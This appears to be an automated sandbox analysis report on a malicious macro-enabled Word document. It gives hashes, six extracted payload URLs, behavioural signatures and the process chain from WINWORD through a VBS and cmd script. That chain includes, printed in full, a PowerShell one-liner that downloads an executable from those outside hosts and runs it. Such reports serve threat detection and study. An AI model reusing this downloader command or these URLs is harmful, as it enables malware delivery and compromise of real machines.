Analysis
-
max time kernel
112s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
21-05-2022 03:38
Static task
static1
Behavioral task
behavioral1
Sample
13_08_2020_62967988.docm
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
13_08_2020_62967988.docm
Resource
win10v2004-20220414-en
General
-
Target
13_08_2020_62967988.docm
-
Size
381KB
-
MD5
3d52b1e551984e203f02d9dcbd8e7e8b
-
SHA1
369dbac4370c025651892ce036dbfd82fbbb4ef2
-
SHA256
37a4488c88924394c225a530ace9dc09a4507d913bea46c49ce14ff43b40f6b8
-
SHA512
7ad63084e0c51727866c784b31bf3a77ea68b28b061327b2e8f8e39e6e2834f77aa69a9922294ca362fa5b4b695762e9fa3c28b1bf2584be9611102e21008e53
Malware Config
Extracted
http://podosenengk12.com/rtjyw/555555.png
http://accent-granit.com/urjikh/555555.png
http://wisedata.technology/xhpcvntvdmj/555555.png
http://kahnamoei.com/vatopbv/555555.png
http://carpalette-hachinohe.com/pdfdxenf/555555.png
http://jung-versand.net/dbjqzkp/555555.png
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
explorer.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3032 444 explorer.exe WINWORD.EXE -
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exeflow pid process 40 3980 powershell.exe 41 3980 powershell.exe 43 3980 powershell.exe 55 3980 powershell.exe 58 3980 powershell.exe 59 3980 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3772 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 3560 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings explorer.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 444 WINWORD.EXE 444 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 3980 powershell.exe 3980 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
taskkill.exepowershell.exedescription pid process Token: SeDebugPrivilege 3560 taskkill.exe Token: SeDebugPrivilege 3980 powershell.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
WINWORD.EXEpid process 444 WINWORD.EXE 444 WINWORD.EXE 444 WINWORD.EXE 444 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
WINWORD.EXEexplorer.exeWScript.execmd.exedescription pid process target process PID 444 wrote to memory of 3032 444 WINWORD.EXE explorer.exe PID 444 wrote to memory of 3032 444 WINWORD.EXE explorer.exe PID 4312 wrote to memory of 4132 4312 explorer.exe WScript.exe PID 4312 wrote to memory of 4132 4312 explorer.exe WScript.exe PID 4132 wrote to memory of 1564 4132 WScript.exe cmd.exe PID 4132 wrote to memory of 1564 4132 WScript.exe cmd.exe PID 1564 wrote to memory of 3560 1564 cmd.exe taskkill.exe PID 1564 wrote to memory of 3560 1564 cmd.exe taskkill.exe PID 1564 wrote to memory of 3980 1564 cmd.exe powershell.exe PID 1564 wrote to memory of 3980 1564 cmd.exe powershell.exe PID 1564 wrote to memory of 3772 1564 cmd.exe timeout.exe PID 1564 wrote to memory of 3772 1564 cmd.exe timeout.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\13_08_2020_62967988.docm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\explorer.exeexplorer.exe C:\ProgramData\Portes.vbs2⤵
- Process spawned unexpected child process
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Portes.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Nipo_Bik\Jorticks.cmd" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exeTaskkill /IM "winword.exe" /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOWerShell Foreach($url in @('http://podosenengk12.com/rtjyw/555555.png','http://accent-granit.com/urjikh/555555.png','http://wisedata.technology/xhpcvntvdmj/555555.png','http://kahnamoei.com/vatopbv/555555.png','http://carpalette-hachinohe.com/pdfdxenf/555555.png','http://jung-versand.net/dbjqzkp/555555.png')) { try{$path = 'C:\Nipo_Bik\Loterios.exe'; (New-Object Net.WebClient).DownloadFile($url.ToString(), $path);saps $path; break;}catch{write-host $_.Exception.Message}}4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exeTIMEOUT /T 104⤵
- Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Nipo_Bik\Jorticks.cmdFilesize
5KB
MD5a0b5cf22bd560df98fbf461a798ec8b7
SHA1e3d2a155cbeeefb366f9f872f1486f4c0016bc29
SHA256a1a58a129f0893b4cdf8dec2616e00727a1d247d13fbcf0b9f1ca573a5aa4ccb
SHA512f7972aad3d643c243ebabba26fc769ed17c68a0dd2d12b1cfddce80014e857b501b3f27118a3aa06565c5b984a82f65a1a4dfa9333f4020a7b7cea5b9c437947
-
C:\ProgramData\Kerpok.vbsFilesize
1008B
MD575b9911265592c7b70e5cc29bc065b61
SHA10a54d7d0923e80e37448e31ae9481e860318be6c
SHA25626c6a8e9ae7ce442c94e85ead16f2fa1d733fa0a917a5e40ca03bf1b2973ac50
SHA512f2d2096ad1f4a5b9c661130fd66cdac1a4d451889a035cfc89527d8cdd41e6bcc8b83585a80210c61b65e13ee8f2cfa108c3c14cdc36f429b1160d7b4c2050dc
-
C:\ProgramData\Portes.vbsFilesize
68KB
MD5dc1b5ee521257fc500fefc81e88ccb9d
SHA142c9a2009e1fcae7de8cb50bd62fb3527b826cf9
SHA25602c28308ba9e17827cabb90d9c92684658c01a52ac90106555e8d46e7fe9f696
SHA51233c4dd9bf6afd01e822cadb08b4dd4bed8a7714ca68f342fdcfca345dfa3eb2fd0b5a4ccef70844d93e76eb7da549995ff98e9969e78b147c383bcbf92c24290
-
memory/444-134-0x00007FFA994D0000-0x00007FFA994E0000-memory.dmpFilesize
64KB
-
memory/444-130-0x00007FFA994D0000-0x00007FFA994E0000-memory.dmpFilesize
64KB
-
memory/444-135-0x00007FFA97440000-0x00007FFA97450000-memory.dmpFilesize
64KB
-
memory/444-136-0x00007FFA97440000-0x00007FFA97450000-memory.dmpFilesize
64KB
-
memory/444-138-0x00000229F0950000-0x00000229F0954000-memory.dmpFilesize
16KB
-
memory/444-133-0x00007FFA994D0000-0x00007FFA994E0000-memory.dmpFilesize
64KB
-
memory/444-131-0x00007FFA994D0000-0x00007FFA994E0000-memory.dmpFilesize
64KB
-
memory/444-132-0x00007FFA994D0000-0x00007FFA994E0000-memory.dmpFilesize
64KB
-
memory/1564-142-0x0000000000000000-mapping.dmp
-
memory/3032-137-0x0000000000000000-mapping.dmp
-
memory/3560-144-0x0000000000000000-mapping.dmp
-
memory/3772-148-0x0000000000000000-mapping.dmp
-
memory/3980-145-0x0000000000000000-mapping.dmp
-
memory/3980-146-0x00000207ABD00000-0x00000207ABD22000-memory.dmpFilesize
136KB
-
memory/3980-147-0x00007FFABA7D0000-0x00007FFABB291000-memory.dmpFilesize
10.8MB
-
memory/4132-141-0x0000000000000000-mapping.dmp